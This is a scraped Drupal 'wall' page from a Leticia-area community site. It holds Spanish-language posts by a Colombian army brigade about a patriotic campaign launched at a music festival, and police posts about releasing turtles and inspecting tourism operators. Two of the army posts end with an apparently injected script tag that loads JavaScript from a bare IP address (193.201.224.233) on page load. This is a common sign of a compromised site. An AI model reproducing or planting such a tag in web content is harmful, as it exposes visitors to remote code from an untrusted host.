Muro

Menssagem de erro

User warning: The following module is missing from the file system: comments. For information about how to fix this, see the documentation page. em _drupal_trigger_error_with_delayed_logging() (linha 1143 de /var/www/tabatingahoje/includes/bootstrap.inc).

Quem está online

Há atualmente 0 usuários online.

Foto de filosofus
sexta-feira, Dezembro 29, 2017 - 09:46
12902
0
0 Comments
Votos totales: 36
Foto de amazonico21
quinta-feira, Dezembro 28, 2017 - 20:38
12901
0
0 Comments
Votos totales: 37
Foto de amazonico21
quinta-feira, Dezembro 28, 2017 - 20:33
12900
0
0 Comments
Votos totales: 46
Foto de ejercitobrigada26
quinta-feira, Novembro 23, 2017 - 10:19

Los Héroes del Ejército Nacional trabajamos por la paz de nuestro país por eso "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar".

12751
0
0 Comments
Votos totales: 57
Foto de emisoraejercitoleticia
quinta-feira, Novembro 23, 2017 - 10:08
12750
0
0 Comments
Votos totales: 53
Foto de ejercitobrigada26
quinta-feira, Novembro 23, 2017 - 09:36

Los Héroes Multimisión de la Vigésima Sexta Brigada realizaron el lanzamiento oficial de la Campaña "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar" durante el primer día del Festival Internacional de Música Popular Amazonense "El Pirarucú de Oro" que se lleva a cabo en la Concha Acústica "Francisco de Orellana" del Municipio de Leticia del 22 al 25 de noviembre.

El Señor Coronel Raúl Alonso Parra Bayona fue el encargado de dar el discurso de apertura con el que se lanzó oficialmente esta campaña que busca arraigar el sentido de pertenencia de la población hacia sus Fuerzas Militares y resaltar la labor que realizan todos sus miembros en los 32 departamentos del país.

El lanzamiento contó con la presentación de la señorita Miss Mundo 2014, Leandra García, y del director de la Emisora Colombia Estéreo 88.5 FM, Sargento Viceprimero José Polo Padilla, quienes fueron los encargados de moderar el evento en el que se presentó el vídeo de la canción oficial "Estoy en tu corazón", se realizó un minuto de silencio en homenaje a los héroes caídos en cumplimiento del deber y se dieron regalos a la comunidad donados por el Ejército Nacional, la Armada de la República de Colombia y la Fuerza Aérea Colombiana.

Los soldados del Ejército Nacional seguimos trabajando por la integridad de nuestro país y sus habitantes, por eso es que "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar" porque somos Héroes Multimisión, Nuestra Misión es Colombia.

Acción Integral de la brigada de selva No 26

12749
0
0 Comments
Votos totales: 56
Foto de ejercitobrigada26
quinta-feira, Novembro 23, 2017 - 09:10
El Señor Coronel Raúl Alonso Parra Bayona fue el encargado de dar el discurso de lanzamiento de la Campaña "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar" y de agradecer en nombre de las Fuerzas Armadas a todos los colombianos que con su afecto y amor nos hacen sentir orgullosos de salvaguardar la integridad y la soberanía de la Nación. <script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
12747
0
0 Comments
Votos totales: 56
Foto de ejercitobrigada26
quinta-feira, Novembro 23, 2017 - 08:28
Los Héroes Multimisión del Ejército Nacional realizaron el lanzamiento oficial de la Campaña "Estamos en el Corazón de los Colombianos y Ahí Nos Vamos a Quedar" en la Concha Acústica "Francisco de Orellana" del municipio de Leticia. El evento se realizó en el marco del primer día del Festival Internacional de Música Popular Amazonense "El Pirarucú de Oro". <script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
12744
0
0 Comments
Votos totales: 58
Foto de policialeticia
quarta-feira, Novembro 22, 2017 - 20:59

Policía y Corpoamazonia permiten a especies llegar a su habitad natural

Acciones ambientales permitieron liberar tortugas de las clases Taricaya y Cupiso

Los animales están avaluada en más de $ 10.000.000 millones de pesos

Leticia – Amazonas – Con el firme propósito de generar conciencia sobre la protección de la Fauna Silvestre y promover cuidado por el medio ambiente, se llevó a cabo una noble actividad que consistió en permitir el regreso a la libertad una gran cantidad de tortugas de la especie taricaya y cupiso, cuyo valor ecológico supera los 10 millones de pesos y que se encuentran en vía de extinción.

Hasta la isla de los micos, ubicado a 33 kilómetros de la ciudad de Leticia sobre el rio Amazonas, llegaron funcionarios del Grupo de Policía Ecológica y Protección al Medio Ambiente del Amazonas, capitanía de puertos de Leticia y funcionarios de Corpoamazonia, para poner a salvo 10 tortugas de la especie taricaya y 6 de la especie cupiso, los cuales fueron entregadas voluntaria por una ciudadana de nacionalidad colombiana, de 51 años de edad, profesión administradora turística

La importancia de esta actividad, se orienta en cuidar y respetar la fauna silvestre de nuestro país, en el caso de las tortugas, son de gran importancia debido a que son las controladoras de los residuos orgánicos en los ecosistemas hídricos (ramas, peces muertos etc.), siendo parte de la cadena alimenticia en los ríos o lagos del país.

Policía Leticia

12737
0
0 Comments
Votos totales: 55
Foto de policialeticia
quarta-feira, Novembro 22, 2017 - 20:54

Policía nacional realiza controles a establecimientos turísticos de naturaleza y aventura

El propósito es verificar el cumplimiento de los estándares de calidad del servicio al público

La actividad permite conocer el nivel de capacitación y profesionalismo de quienes orientan este tipo de actividad

Leticia – Amazonas – La Policía Nacional a través el Grupo de Protección al Turismo y Patrimonio Nacional; viene desarrollando acciones de prevención y control en los entornos naturales donde se desarrolla turismo de naturaleza y aventura en esta región del país.

Durante la actividad fueron visitados la Reserva Natural TANIMBOCA, Reserva Natural OMAGUA, Parque Temático MUNDO AMAZONICO y la Agencia Operadora de Turismo KASAFE TOURS, establecimientos que se encuentran ubicados sobre la vía los kilómetros Leticia-Tarapacá, esto con el fin de verificar y constatar que cada uno de estos lugares, cumplan con los requisitos de ley para ésta modalidad del servicio al público.

A través de esta visita se inspecciona la calidad de cada uno de los equipos que son utilizados para esta actividad turística, de manera que cumplan con los requisitos legales y los estándares de calidad y seguridad exigidos para este tipo de servicio a los visitantes; igualmente, se verifica el nivel de capacitación y profesionalismo de las personas que orientan este tipo de actividad.

Policia Leticia

12736
0
0 Comments
Votos totales: 59